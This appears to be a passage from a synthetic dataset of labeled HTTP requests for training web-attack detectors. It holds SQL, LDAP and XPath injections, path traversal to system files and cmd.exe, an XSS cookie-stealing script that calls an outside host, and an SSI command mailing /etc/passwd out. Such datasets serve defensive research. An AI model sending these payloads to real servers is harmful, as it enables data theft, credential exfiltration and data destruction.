Client-ip: 87.5.203.76
Cookie: zbinoGN= itgt;b1qasn=3066784;nbwka9K=022807;Jt.0tC=tneahyqasd;pyynTaeiphldf=ilbemereA;Dciae7aonoapn=536
Cookie2: $Version="59"
Date: Wed, 01 Feb 06 11:30:50 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Fri, 06 Nov 09 18:59:22 CET
If-Match: *
If-None-Match: "tG_FF.Vbh0_K-UJX"
If-Range: Wed, 21 Jan 09 22:14:46 UTC
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest uri=http://eI1oyl3r.net/tiehotb/hkua.jsp
Range: 711-
Referer: /5ke0e5.tiff
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/1.7 (compatible; fodBt; Unix; t7eenj5)
UA-CPU: 68000
UA-Disp: 0225,7025,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: HTTP/1.3 www.6meeniae.js:105
Transfer-Encoding: gzip
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

eeo=hs&jxgzTL=' /**/ OR  /**/''  =   '&ausobe=8244593&mrs=tardwsnrehiej&oEagagdzb=eobdlilse&oot3Snien1SetV=7609299360&8SautoexectmpTjXE4XJR=ffzhnai08ir

End - Id: 41396
Start - Id: 38772
class: LdapInjection
GET /mSLq@/Kgroup bylogHM4mkapin/guXgblVF@Ew/-style9telnetad/YN1Om_httph9woin/zyZ3M/el7rpaeaETc/03suigtqn1/bQnm/lOtr-8J4FjEDx3rC.l/hTeM_UU.jpg?lmhputrkxshl2=dk6eb&4XUAhe5htiml=Uoptoo&ojnareLae9aoE=8184%29%28%26%28objectClass%3Dltt%29%28%7C%28sn++%3D++++ecpN%29%28cn%3Dmora++++J*%29%29&ye=%3A%5Cog&TATaoi=ees HTTP/1.1
Host: www.rsmpnt4cno.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: asecmd-rG, yasa6Ee-aszdale, srs-ey
Cache-Control: only-if-cached
Client-ip: 141.187.117.244
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="379"
Date: Fri, 18 Jul 08 18:18:42 UTC
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Thu, 25 Jan 07 11:01:47 GMT
If-Unmodified-Since: Wed, 21 Oct 09 22:55:20 UTC
If-Match: *
If-None-Match: "09SfpQoN4PoPVLF"
If-Range: *
Max-Forwards: 793
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: http://iOFtn.de/oN9yomie/3ticef/tSitm.asmx
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (Windows; U; Win98 9.5; li-ox; rv:8.8.3) Gecko/80028305
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: compress
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 40.116.222.105
X-Serial-Number: 323337935267147
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38772
Start - Id: 50026
class: XPathInjection
PUT /jBC@FSJJchildhtacceshttp5j/nfl1@gtGG1qhze3ETiPs/ovb6r@nsJAKZJSpL98/poiadnlierr/ghkfthin7/avm1aiTiSjs/scgIztXnuh/ldKhpyAhf/bI3oalQ.png? HTTP/1.0
Content-Length: 243
Content-Language: mg,dvOvhaan,t
Content-Encoding: identity
Content-Location: /whocm/zeaai/4aeair/dsme.tar
Content-MD5: cXRuaGxubk4zcG9lc3QwaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Dec 09 06:30:31 UTC
Last-Modified: Tue, 30 Dec 08 06:40:51 CET
Host: www.ajpsts8r6.ch:3
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: l-Rhe, e-dI9oti
Cache-Control: zmlaho9='ehris'
Cookie: rB0dApler=dTexecaa;eltvc0=2pFjC
Cookie2: $Version="41"
Date: Thu, 05 Jul 07 08:14:49 GMT
Expect: 3edmta6m
From: nedh@e0uheaoepd.com
If-Modified-Since: Wed, 30 Aug 06 18:16:18 GMT
If-None-Match: *
If-Range: Wed, 25 Nov 09 18:20:00 GMT
Max-Forwards: 77
Proxy-Authorization: Basic bm9ldzhpdTpuaHRubw==
Authorization: Digest username="1oupNa6o"
Range: 8-710
Referer: /yom54wK/htaE8yIa.php
TE: gzip;q=0.8,trailers,gzip
User-Agent: ho'  or  6   < count(path/child::*)    or  'itirn' =    '
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 412x6538
Via: aBeae/3.2 www.eot6rti.png
Transfer-Encoding: identity
Upgrade: odsrn/7.3, noifE/8.7
Warning: 364 www.snye8.shtml "eosaaz" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

o8negvdobago=e1%dashutdown1|ittat&jxtermrcpHvWlinkF=4865619&9azh26beeEathsn=e@vL8ay@B&E0cQyOl.=57&ohcnEVd=607020&homepassthruJ-access_log=9Ox1s8&intv&udprd79m=191040&a3H6te=r&nnae8gp=6557&aygI3=93&wsejreee=l24p eetd&ttol9t0exrwrRud= 

End - Id: 50026
Start - Id: 42478
class: SqlInjection
GET /yHXJN7TeeQrYo/pwplhHaprrlldo1/b214u4CbrNeo.7@xhvi/AlsvLW6b8/apreaptmyjalteab53o/tCjUE2/n3eie41o9ls42WT/g3tnoj.gif?t0oqThS4n=%27%3B+++++drop+++++table+admin HTTP/1.0
Host: www.n9ou4t6mw.gov
Connection: keep-alive
Accept: text/*;q=0.6, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, gzip;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 89.45.12.136
Cookie: ehcfue=csrn
Cookie2: $Version="2"
Date: Sat, 12 Jan 08 11:08:52 UTC
ETag: "ucyTNdNZwmzBEzMRFjR"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Thu, 10 Dec 09 19:59:50 GMT
If-Unmodified-Since: Mon, 24 Oct 05 17:34:19 CET
If-Match: "UlDPhJKra-i9UTFwv"
If-None-Match: "yo2o7LlG6dr701a7PRs"
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 3660
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 7-59040
Referer: http://www.lide0tu.net/ztsbyes/e4d5snne/6ethr5/h2re.fgf
TE: deflate;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (compatible; Konqueror/1.7; Windows NT; atDeieK; eeau; irdhk)
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/5.4 183.214.192.178, FTP/8.1 www.heag.html
Transfer-Encoding: deflate
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42478
Start - Id: 38476
class: LdapInjection
GET /5W1miww-GPHGlz/ggvtX/kXIjmsMiW9IF7p/amtdrmgeH0ng/lusVA3p-w2Sh41I5v9/edO3/xFamposoimoseeh7m/cakd/ietdeseeoolattdiiSz/u.sVfYrlwO.cgi?p_inputxml=lNQ.VumK&jexgorsRe=tgIgWtYZN%40X&nsogfao=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&xjIlPYm=HeeRaNd2jb4rOe&9WcQ5URiframe=stdinia&srzc5t=yai&Us=ita&1nfromIWFz=ytahzd&eec3tywc=osA&mi=2211591933&iw4etudoarrv=2&ytecnea4iI8ut=ljnue3euEdialdx&ssieaeeshoeemr=324432&lV8odteigHm5u=34 HTTP/1.1
Host: 173.216.52.213
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="51"
Date: Fri, 23 Sep 05 22:06:05 CET
ETag: W/"HdLDJ1hGjmZABeS"
Expect: 100-continue
From: odvt@tmdyhis.org
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Jan 07 23:05:54 GMT
Max-Forwards: 7
MIME-Version: 6.7
Pragma: tsdp0due='hpl'
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic bm40czM6OGFvN2M=
Range: 24-,76759-,-19589
Referer: /uttyxr/n4LsSlaa/nmsmaoh.mdb
TE: chunked,gzip,gzip
Trailer: Warning
User-Agent: awbeTdrt06 (t@Z4e5CCg)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0403x7270
Via: HTTP/8.2 www.esNa.jpg, HTTP/4.2 50.206.238.222, 1.4 77.17.13.166
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 863 www.oneLt.gif "lrRpIern" "Sun, 11 Oct 09 06:27:08 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38476
Start - Id: 39055
class: LdapInjection
POST /u5GzyX0OyzQ/tDVw6NykvO/n32GZ4vxnYk3CJEx/0lrm/0vT3Lo3ky/uO6rbEJ8oyjEFO3RB/neuiIirJYa2YV1L@1LJ0.php3? HTTP/1.1
Content-Length: 195
Content-Language: Eaggrtli,syjnu
Content-Encoding: gzip
Content-Location: /t0tyn/hcEh9eTo/tyfut/FaneCi/nsteceg.asp
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 24 Feb 06 16:59:26 CET
Host: 168.192.39.24
Connection: ittires
Accept: */*;q=0.2
Accept-Charset: x-mac-roman, utf-8, windows-1253;q=0.8, macintosh, iso-8859-15;q=0.9
Accept-Encoding: compress;q=0.3, gzip;q=0.9
Accept-Language: *
Client-ip: 173.96.232.171
Date: Sun, 17 Oct 04 18:44:42 CET
Max-Forwards: 74
Pragma: no-cache
Referer: http://www.acnq3qEi.st/tr4de/lih2na2/esgttr6/CuAef/Ortno.cgi
User-Agent: )   ( |   (displayName=had*) (name    =   had*  )(mail=had*    )
Via: 8.7 www.1rn9.shtml
Upgrade: Tov/7.1

zAImrege6b6t=hIb1wVhidU&s7fth2lddsuaajr=3&LSinlExp_T1=oiakLtoiI3niealute&wz=nkj&7Hoo4hUsj=295203&erEegaoee=hitsr&xerm=mCv@YF&ohq=rrsa7m&8TleheylenThr6=O51~adtPtiteaseN&&window.openxT4F=7eog

End - Id: 39055
Start - Id: 46753
class: XSS
GET /q2eia5teiwth/QlKA/lVI_yL/o10-SSSCC@Cv/r4ieexg/sY/nV85o5Y/n.pFeIz-y4cHFN2/n5Na/havingsAjV6KM.pl?81nhI4u=8oo%27adIeistdin%7Ep%22alib%22t%27&oqservices0opt.YcJvmpasswd=8304&anthpxrh=005&wtos359lhwasri=626131&daeoHqo=i0qrSs HTTP/1.0
Host: 214.183.188.242
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1251, euc-jp;q=0.6, windows-1254;q=0.5, windows-1257, x-mac-roman
Accept-Encoding: gzip;q=0.7, gzip;q=0.9, identity;q=0.4
Accept-Language: oeT8e-ht, t-ht;q=0.9, rarh-ndrei0q, e-e6sRthH;q=0.4
Cache-Control: max-stale=05336
Client-ip: 206.197.219.246
Cookie: loceib9=<body     onload =   " [document.location.replace   ('http://www.ndat.com/cgi-bin/as.cgi'+document.cookie);] "  >;teoe=usOe~utve5[;ikh=rSVyhH;bbE68e8mIy=jYnXitbNqw;kNmeeqsp=295
Date: Wed, 13 Jan 10 13:45:05 CET
Expect: 100-continue
If-Modified-Since: Wed, 25 Feb 09 13:08:27 GMT
If-Unmodified-Since: Sat, 08 Dec 07 14:27:45 CET
If-Match: "7z2XFHfTX5Qag_6jlQDw"
If-None-Match: *
Max-Forwards: 8
Pragma: no-cache
Authorization: uhnri spaiinmr=hhjln
Referer: http://hTae44.gov/vtse4/tItut/iiaD/nanevdex.msf
TE: trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/7.6 (compatible; ad4loadAw; Win98; nbho6iosdd; cihlaueuy; jyfuets)
UA-CPU: PowerPC
Via: 0.4 76.187.253.154
Transfer-Encoding: compress
Warning: 249 www.fwhwk.htm "usscchornmwtEs1afes" 
X-Forwarded-For: 12.112.216.2
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46753
Start - Id: 45433
class: PathTransversal
POST /aIrzettsdoieoslS/pGggBZstdinPxLEEN/iosaa.php3? HTTP/1.0
Content-Length: 37
Content-Language: aiia,metjaeoi
Content-Encoding: compress
Content-Location: /ise9.cfm
Content-MD5: NW9ldXN0bzRzZ25hYXBwMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Sat, 04 Mar 06 21:02:55 UTC
Host: 95.14.138.92:822
Connection: eAfrb
Accept: text/plain;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.1
Accept-Language: lnesh-td, hOtgsr7d-td35h
Cache-Control: no-store
Client-ip: 127.38.121.80
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="00"
Date: Tue, 24 Jun 08 24:58:30 UTC
ETag: "0EhvIuiP_jDS20ntRRir"
Expect: nHenleg
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 16 Feb 06 10:25:30 UTC
If-Unmodified-Since: Wed, 18 Feb 04 10:04:49 CET
If-Match: "pqBflgYPsq09-3HXqT"
If-None-Match: "vGKoP1yRRdXDmWp9Z"
If-Range: "GSCfKCXE0ARYEh7AN"
Max-Forwards: 4978
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: 6o5h dLroEs=ttjacl
Authorization: Digest username="otlt7"
Range: -292636,082693-
Referer: /xu8Rjqb/ab82aaet.dll
TE: deflate,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.7 (compatible; MSIE 0.6; Win 9x; dfhttoilSd)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 357x895
Via: HTTP/8.9 245.103.187.32, 4.5 www.Bhea.tiff
Transfer-Encoding: compress
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 027 www.80Tmnqe.tiff "nrptaalt484raSb7" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rwa5n13h=w:\\WINNT\\win.ini

End - Id: 45433
Start - Id: 36090
class: PathTransversal
GET /uriee3oE9lLmeoadq/d1.lqnLw7/tRtf5o/a.ukNMSachUZ9MarD1/rin/e@R_LZTq8eikkCMME/a5CrG9BIrACEv5/rstatbntqNdgT4rli.bin?OWZM=wgeteainput%3FncNR+%2Bnodeoyr&tc0ecsaethm=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.t6wyeToge.st
Connection: close
Accept: application/*, text/html, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 251.22.181.223
Cookie: atmule=DN ;tfo5ru2hSitneos=486720;8nigochrssr=27329713;qRkUS.u0a=ieAhe
Cookie2: $Version="6"
Date: Tue, 10 Apr 07 07:24:32 CET
ETag: W/"vj6-gIvwcOr79OE6"
Expect: urhmnt=re1d
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: "QVsJ.ZguPpzRQhYOp8d"
Max-Forwards: 73
MIME-Version: 8.7
Pragma: m='plP90'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM amJzZXlpdHpiZTVsaWFic3J0cnhpTnRpY2FwZVl0YXNvYWllaW1oZGRpbGE=
Range: 580617-399630,-49399
Referer: /aiuxtew/onAaE/eaumun/si0osths/aohdR.nsf
TE: trailers,deflate;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/7.4 (compatible; MSIE 7.0; SunOS sun4u; tlnSfec; afbta0ea)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5584x598
Via: 2.7 101.14.29.209:9
Transfer-Encoding: identity
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 521332915
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36090
Start - Id: 48983
class: XPathInjection
GET /6h_4divb2C7rcpO/ehta/Rs0ema4otie.pl?9te=njehY%2Fe&7emailCmYG29gF=n+H%29&0eoseite5=Olsf%2Fte%2Forafee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D++++or+++++%27wO%27+++%3D++%27&liyxtl4ood5na3v=189876&zldmrvwptdiexeo=seuz8orenng&btjrdsvjh=goaseotnboihtriree&6gTadmin5uJJ=e9EzAC&QN@X=ga4ucerlw03htil&nbbs6i=l8snwe HTTP/1.1
Host: www.iwieEs.fr:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-4, iso-8859-6, iso-8859-8, x-mac-hebrew
Accept-Encoding: 
Accept-Language: eArstlen-eziii9, ch-m;q=0.8
Cache-Control: max-stale
Client-ip: 40.113.236.96
Cookie: hwsUw=ainnfl:ehhttpgroup by;rtrsesiiwqsajss=access_logs?n q9zgroup byobjectWlhome;vhMheeiIhnbla=pErethe8thih
Cookie2: $Version="9"
Date: Sat, 05 Jul 08 11:35:14 CET
ETag: W/"lPG-MvOD7oai6QqX"
Expect: ovnum=suieMbtt
From: 6icshpO@RtgPShLon.org
If-Modified-Since: Sat, 17 Dec 05 09:19:30 CET
If-Unmodified-Since: Mon, 19 Sep 05 05:27:28 UTC
If-Match: "Ji1bZJJEocmtxGF9aP"
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: "CGu19_3Px1FMCkUCO1"
Max-Forwards: 00
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: 1tatvh erM6=ces6st
Authorization: NTLM cmVsOVRkY2Fob3I1MUNnam9jZWE0dG9yZW9vZGFnczhudHd6ZHNkdG9i
Range: 23-,057-,45-
Referer: /cmtnesps/nTbsie/oa8by/rhNanr.asmx
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: oBprt3Egy
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8171x6640
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: gzip
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48983
Start - Id: 44190
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.ouwhhg.be
Connection: keep-alive
Accept: text/*;q=0.2
Accept-Charset: iso-8859-2;q=0.2
Accept-Encoding: identity;q=0.2, compress;q=0.5
Accept-Language: ir-s6o
Cache-Control: no-cache
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Sat, 05 Jun 04 09:40:01 GMT
ETag: "BRW_@ARVUq6pOiuJ"
Expect: 100-continue
From: gozi@ydNwdaf.st
If-Modified-Since: Thu, 08 Dec 05 02:40:00 UTC
If-Unmodified-Since: Wed, 07 Jan 04 03:20:55 GMT
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: Thu, 30 Dec 04 04:25:15 GMT
Max-Forwards: 0026
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 22399-
Referer: http://esnnes.gov/oArsd/gneAd/tedob/graw.png
TE: trailers
Trailer: Referer
User-Agent: saWnnee
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 389x154
Via: 8.5 www.2mraoMi.js, HTTP/4.0 7.123.118.193
Transfer-Encoding: gzip
Upgrade: daad/0.7, ule/2.7
Warning: 029 235.65.195.127 "i3YfHit9o" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44190
Start - Id: 38912
class: LdapInjection
GET /TetshNhenrciabe/nXt-/tcEasm/YC4position.YBKUWh_Alogr/oetglobSptlbbn/0rmeehav7Rytyferneab.cgi?shb=omailt+Setc%25%26r%3Flsdr%26Ld&soxgrbasjie=%29+++%28++%7C+++%28displayName%3Dhad*%29++%28name+++%3D+had*+%29%28+++mail%3Dhad*++++%29&zfrwore=e+zjtardhdeN0G7&9nBnl3irne8=dor&edrKruthjhw=6343&2cTallUVW=r%7Eht&ertgqacmcgle=13677&uea5Doa=0421688428&edat=64895&tio=536410546&saIecrrcksnyi=hnrteag7t7ae HTTP/1.0
Host: 39.197.55.74
Connection: keep-alive
Accept: image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oe-etwejeu, 3diS-x
Cache-Control: only-if-cached
Client-ip: 28.220.202.244
Cookie: _CWaDK=Rla;iAhdeitrUik=8
Cookie2: $Version="45"
Date: Sun, 08 Jan 06 21:49:04 UTC
ETag: W/"E8jHF1YpjxHTbtDDxA"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Mon, 02 Jun 08 13:29:09 GMT
If-Unmodified-Since: Sat, 21 Jun 08 08:30:30 CET
If-Match: "tPJS-._P.Hq9OBZvSK"
If-None-Match: "L7CN2SfNtJQlPfAas."
If-Range: Mon, 25 Feb 08 19:37:38 GMT
Max-Forwards: 607
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: hgeet tYei=R5lh
Range: 979-,2-1
Referer: /1i7dti.pdf
TE: chunked;q=0.6
Trailer: Range
User-Agent: zino (srMxrz@N.F; 7@LVmjncHX)
UA-Disp: 982,9974,16
UA-OS: Win95
Via: 6.7 113.233.112.39:36875, FTP/1.4 www.fcercqe.css
Transfer-Encoding: gzip
Upgrade: toues/6.2, Lrne/8.5, oec5E/9.4, eyhe/5.1, eneaoo/3.9
Warning: 239 www.vyh2ooi.js "ghiwstugdquhncr" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38912
Start - Id: 36626
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 46.190.244.244
Connection: keep-alive
Accept: application/x-tar;q=0.8, video/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate, gzip;q=0.7, gzip, gzip;q=0.9
Accept-Language: *;q=0.5
Cache-Control: max-age=725
Client-ip: 107.48.3.140
Cookie: pn=57824;iseee1t=881;urriow=pu>k@6Thd;processing-instructionnCNzlinkHi=644027670;tet=g8DClC
Cookie2: $Version="2"
Date: Wed, 04 Jun 08 11:20:35 UTC
ETag: "zWK@khPcwyjwc74KjL"
Expect: 100-continue
From: safieadn@TokeCnm8Oe.org
If-Modified-Since: Tue, 27 Apr 10 16:28:36 GMT
If-Unmodified-Since: Wed, 28 Jul 04 19:39:57 GMT
If-Match: "Zfu_h_5WHl@Byl-j8S3H"
If-None-Match: *
If-Range: Tue, 29 Jun 04 04:41:26 GMT
Max-Forwards: 719
MIME-Version: 2.7
Pragma: aastt='ryrw'
Proxy-Authorization: Digest qop=auth-int
Authorization: tDus rndeoby=anuya
Range: -8,4-,75-7
Referer: /6wChir/hihwo/csda.mpg
TE: chunked;q=0.9,trailers,deflate
Trailer: TE
User-Agent: Mozilla/9.3 (Windows; U; WinNT 6.9; bA-Tq; rv:4.0.9) Gecko/28854191
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: compress
Upgrade: aDote/0.4, nnlrf/4.3, ecsEa/7.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36626
Start - Id: 40622
class: SSI
GET /ufzZNeMx1A5CZD49Ntz/uusiOc/p3icXxl/fOwSVRaW6sl@NdOgY/e6OFN591CIepM8rjlX/bAuBM7W/XhttpTQTaccess_logwt5.nsf?MI9spjK=aiayprocessing-instructionlo&ksaRmn4ia=%3C%21--+++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&artJ7aise=5032&hx=aoU&rI5t=673275 HTTP/1.1
Host: www.ld6ktnsya.it
Connection: aiErpe
Accept: image/*;q=0.6
Accept-Charset: x-mac-ce;q=0.2, euc-cn, x-mac-japanese, x-mac-japanese
Accept-Encoding: *;q=0.5
Accept-Language: 2orr-4eehae;q=0.0
Cache-Control: no-transform
Client-ip: 74.254.15.74
Cookie: 7G9ytgaHw=320458;xnelsno7x=i:rtsoete dhijoemochahe;ItharduicR=qxsigiliae;s2slEneinid=9;9honhxeehisrjn=y;sodsns=802181539
Cookie2: $Version="64"
Date: Thu, 31 Mar 05 24:47:15 CET
ETag: "BSYbTuX7wGz5Vkk"
Expect: 100-continue
From: tcb6@st75oiFP0e.net
If-Unmodified-Since: Sat, 13 Oct 07 01:04:34 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 309
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: 5dny iidu4=nicettyt
Authorization: Digest realm
Range: 656012-5
Referer: http://ht4h.be/tlus/eatn/ntsh9do/ltEokR.shtml
TE: gzip
Trailer: Max-Forwards
User-Agent: e@tvUWgYE_ http://www.jIrrnw.it
UA-Disp: 959,926,32
Via: FTP/1.3 7.4.108.62
Transfer-Encoding: deflate
Upgrade: 43bua/6.8, mrble/6.7, ntta/4.0
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 5234187897202701
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40622
Start - Id: 40071
class: SSI
GET /Yttlh/NeWDKdZ1/agohileNcor5odr0bhxh/nEEiKtz.B4/hjV1A2mM-W9o/Y4sTnpNTdimgd6ubetween/a@H_jAe6L/tvNlIWV/objectjxRPboot.ini@m8o.css?eo=b%24Xahe&emele=30%5Cdt%3Ei%3Blmn%27%3E7&cji=dCit6OVm3e&lelli2e2=t7mfmnhE&KOnlreplace=0passwdd6&usAop0aipyue=%3C%21--%23exec++++cmd%3D%22%2Fbin%2Fmail+uAttiitam.com++++%3C++%2Fetc%2Fpasswd%22--%3E&axtbsamRxG8p=rv&hgposae=yiotAw%28cdorprocessing-instructionr3rtallpasswdchild&8LL_-=t98FsP6X9rV HTTP/1.0
Host: 235.21.232.101
Connection: silNtd
Accept: text/*, application/postscript;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
